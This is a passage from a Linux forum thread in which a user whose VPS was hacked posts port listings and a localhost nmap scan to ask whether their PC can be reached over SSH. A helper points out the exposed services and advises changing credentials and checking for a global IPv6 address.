EDIT: BTW u cant go wrong with that test. how can i ? i looked up `whatsmyip` and paste that ip in : `https://pentest-tools.com/network-vulnerability-scanning/port-scanner-online-nmap` and i clicked `Start Scan` with defaults selected. Now i also set on `detect operating system` on scan options. And tested again, same. But also im doing another search now with `detect operating system` selected and on UDP side now. Its scanning now.
ps aux | grep sshd
root 547 0.0 0.0 9100 5592 ? Ss Dec14 0:00 sshd: /usr/bin/sshd -D [listener] 0 of 10-100 startups
guns 129486 0.0 0.0 6620 4220 pts/8 S+ 19:56 0:00 grep --color=auto sshdss -tulpen
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:5353 0.0.0.0:* uid:976 ino:3070429 sk:d cgroup:/system.slice/systemd-resolved.service <->
udp UNCONN 0 0 0.0.0.0:5355 0.0.0.0:* uid:976 ino:3070419 sk:e cgroup:/system.slice/systemd-resolved.service <->
udp UNCONN 0 0 192.168.1.101:38909 0.0.0.0:* users:(("Socket Process",pid=2712,fd=32)) uid:1000 ino:5342463 sk:f cgroup:/user.slice/user-1000.slice/user@1000.service/app.slice/app-firefox@07ace7323dc441e587ced4bfd8ab285d.service <->
udp UNCONN 0 0 127.0.0.54:53 0.0.0.0:* uid:976 ino:3077121 sk:10 cgroup:/system.slice/systemd-resolved.service <->
udp UNCONN 0 0 127.0.0.53%lo:53 0.0.0.0:* uid:976 ino:3070975 sk:11 cgroup:/system.slice/systemd-resolved.service <->
udp UNCONN 0 0 192.168.1.101:34143 0.0.0.0:* users:(("python3",pid=53087,fd=11)) uid:1000 ino:5685989 sk:12 cgroup:/user.slice/user-1000.slice/user@1000.service/session.slice/gvfs-daemon.service <->
udp UNCONN 0 0 192.168.1.101:3702 0.0.0.0:* users:(("python3",pid=53087,fd=12)) uid:1000 ino:5685990 sk:13 cgroup:/user.slice/user-1000.slice/user@1000.service/session.slice/gvfs-daemon.service <->
udp UNCONN 0 0 239.255.255.250:3702 0.0.0.0:* users:(("python3",pid=53087,fd=10)) uid:1000 ino:5685988 sk:14 cgroup:/user.slice/user-1000.slice/user@1000.service/session.slice/gvfs-daemon.service <->
udp UNCONN 0 0 [fe80::c5bf:b51:fee:3cc3]%wlp0s20f0u10:37654 [::]:* users:(("python3",pid=53087,fd=8)) uid:1000 ino:5690495 sk:15 cgroup:/user.slice/user-1000.slice/user@1000.service/session.slice/gvfs-daemon.service v6only:1 <->
udp UNCONN 0 0 [::]:5353 [::]:* uid:976 ino:3070430 sk:16 cgroup:/system.slice/systemd-resolved.service v6only:1 <->
udp UNCONN 0 0 [::]:5355 [::]:* uid:976 ino:3070427 sk:17 cgroup:/system.slice/systemd-resolved.service v6only:1 <->
udp UNCONN 0 0 [fe80::c5bf:b51:fee:3cc3]%wlp0s20f0u10:546 [::]:* ino:5688592 sk:18 cgroup:/system.slice/NetworkManager.service v6only:1 <->
udp UNCONN 0 0 *:1716 *:* users:(("kdeconnectd",pid=2240,fd=39)) uid:1000 ino:27762 sk:19 cgroup:/user.slice/user-1000.slice/user@1000.service/app.slice/app-org.kde.kdeconnect.daemon@autostart.service v6only:0 <->
udp UNCONN 0 0 [fe80::c5bf:b51:fee:3cc3]%wlp0s20f0u10:3702 [::]:* users:(("python3",pid=53087,fd=9)) uid:1000 ino:5690496 sk:1a cgroup:/user.slice/user-1000.slice/user@1000.service/session.slice/gvfs-daemon.service v6only:1 <->
udp UNCONN 0 0 [ff02::c]%wlp0s20f0u10:3702 [::]:* users:(("python3",pid=53087,fd=7)) uid:1000 ino:5690494 sk:1b cgroup:/user.slice/user-1000.slice/user@1000.service/session.slice/gvfs-daemon.service v6only:1 <->
tcp LISTEN 0 80 0.0.0.0:3306 0.0.0.0:* uid:957 ino:8856 sk:1 cgroup:/system.slice/mariadb.service <->
tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:* uid:976 ino:3070976 sk:2 cgroup:/system.slice/systemd-resolved.service <->
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:* ino:8750 sk:3 cgroup:/system.slice/sshd.service <->
tcp LISTEN 0 4096 127.0.0.1:27017 0.0.0.0:* uid:952 ino:20745 sk:4 cgroup:/system.slice/mongodb.service <->
tcp LISTEN 0 4096 127.0.0.54:53 0.0.0.0:* uid:976 ino:3077122 sk:5 cgroup:/system.slice/systemd-resolved.service <->
tcp LISTEN 0 4096 0.0.0.0:5355 0.0.0.0:* uid:976 ino:3070420 sk:6 cgroup:/system.slice/systemd-resolved.service <->
tcp LISTEN 0 80 [::]:3306 [::]:* uid:957 ino:8857 sk:7 cgroup:/system.slice/mariadb.service v6only:1 <->
tcp LISTEN 0 10 *:3389 *:* uid:967 ino:8775 sk:8 cgroup:/system.slice/gnome-remote-desktop.service v6only:0 <->
tcp LISTEN 0 511 *:443 *:* ino:10626 sk:9 cgroup:/system.slice/httpd.service v6only:0 <->
tcp LISTEN 0 50 *:1716 *:* users:(("kdeconnectd",pid=2240,fd=40)) uid:1000 ino:27763 sk:a cgroup:/user.slice/user-1000.slice/user@1000.service/app.slice/app-org.kde.kdeconnect.daemon@autostart.service v6only:0 <->
tcp LISTEN 0 511 *:8080 *:* ino:10608 sk:b cgroup:/system.slice/httpd.service v6only:0 <->
tcp LISTEN 0 4096 [::]:5355 [::]:* uid:976 ino:3070428 sk:c cgroup:/system.slice/systemd-resolved.service v6only:1 <-> nmap localhost
Starting Nmap 7.98 ( [url]https://nmap.org[/url] ) at 2025-12-15 19:57 +0300
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000070s latency).
Other addresses for localhost (not scanned): ::1
Not shown: 995 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
443/tcp open https
3306/tcp open mysql
3389/tcp open ms-wbt-server
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 0.07 secondsI hope they didn't close it after connecting? If they did, I guess the connection will be lost?
What do you think ssh has to do w/ REACT or React2Shell specifically?
They saw my ip in last connections in server. `guns` username same. Passwords similar.
Do you run the React server components anywhere?
Yes, in the VPS and local development.
For local dev; as far as I remember, I didn't configure the domain as `conf`, but as far as I can see, there is no such situation on the PC:
cat /etc/resolv.conf
# Generated by NetworkManager
search local
nameserver 192.168.1.1
nameserver fe80::1%wlp0s20f0u10For all we know your system crashed, god knows why and you came up w/ a story that this was due to a failed attack on your non-existing ssh server because R2S and reasons.
I think you're a little distracted Same for me. I mentioned many times but after these attempts im going to guess u didnt like the answer or the logic is not fit in ur mind. Lets say nothing to do with. Because it doesnt have any attack related/based relation.
Actually we just digging. Otherwise my question is clear. I was worrying about my pc. Because my VPS hacked. Same user, same ip address using both pc and vps. And lets say thats it ?
THIS WILL SOLVE:
`non-existing ssh server` so which means; my pc CANT be connected via SSH ? People CANT connect my pc with ssh ? The one and only; ssh connection with its command : ```ssh guns@myip``` or ```ssh root@myip``` ?
Can we surely say; `no it cant/wont connect ?` cuz since 0 ports open and u said `non-existing ssh server` ? cuz my pc do not run ssh-server and using standart ssh package for `OUTGOING` ssh connection/usage ? And not for receive it ?
Last edited by jojo06 (2025-12-15 18:07:15)
Offline
#24 2025-12-15 18:53:40
- seth
- Member
- From: Don't DM me only for attention
- Registered: 2012-09-03
- Posts: 71,538
Re: [SOLVED]Can attackers penetrate my pc ?
I hope they didn't close it after connecting? If they did, I guess the connection will be lost?
Nobody closed anything, but you *ARE* running an ssh and http server on that system as well as mysql on that system.
If/since they're not WAN facing but behind a NAT (have you checked the IPv6?) it's however unlikely that they've been accessed outside the LAN.
They saw my ip in last connections in server. `guns` username same. Passwords similar.
So your actual concern is that your credentials have been exposed.
==> Change them *everywhere*!
Yes, in the VPS and local development.
You've hopefully nuked all systems where this was WAN-facing.
nb. that the first series of patches did NOT fully fix the CVE
Can we surely say; `no it cant/wont connect ?` cuz since 0 ports open and u said `non-existing ssh server`
I didn't say there's no ssh server and your last post indeed shows one.
Other than that, check the global IPv6 if you have one (fe80::* is not a global IPv6).
Do not post it here or anywhere else.
Offline
#25 2025-12-15 19:25:44
- jojo06
- Member
- Registered: 2023-11-04
- Posts: 340
Re: [SOLVED]Can attackers penetrate my pc ?
Am i running ssh server ? How to close http tho ? yeah should close mysql.
Idk how to check IPv6.
==> Change them *everywhere*!
I changed pw. What happened, happened. Thats not the point. Im going to reset and change a lot things if ssh could achieved.
So your actual concern is that your credentials have been exposed.
@seth no ! my only and only concern is can they ssh connect me. its all my concern. not server no hacking, no creds, not life, nothing. just can ssh connection established my pc. thats all my concern. thats it. thats the only concern. this is my only concern. nothing else. just 1. the ssh thing. just it.
You've hopefully nuked all systems where this was WAN-facing.
Such as ? Oh u mean the server using that version. yeah the services are stopped. not serving that anymore. its not running.
Other than that, check the global IPv6 if you have one (fe80::* is not a global IPv6).
Can you tell me how ? And UDP search requires some time ? Its still scanning it says.
Offline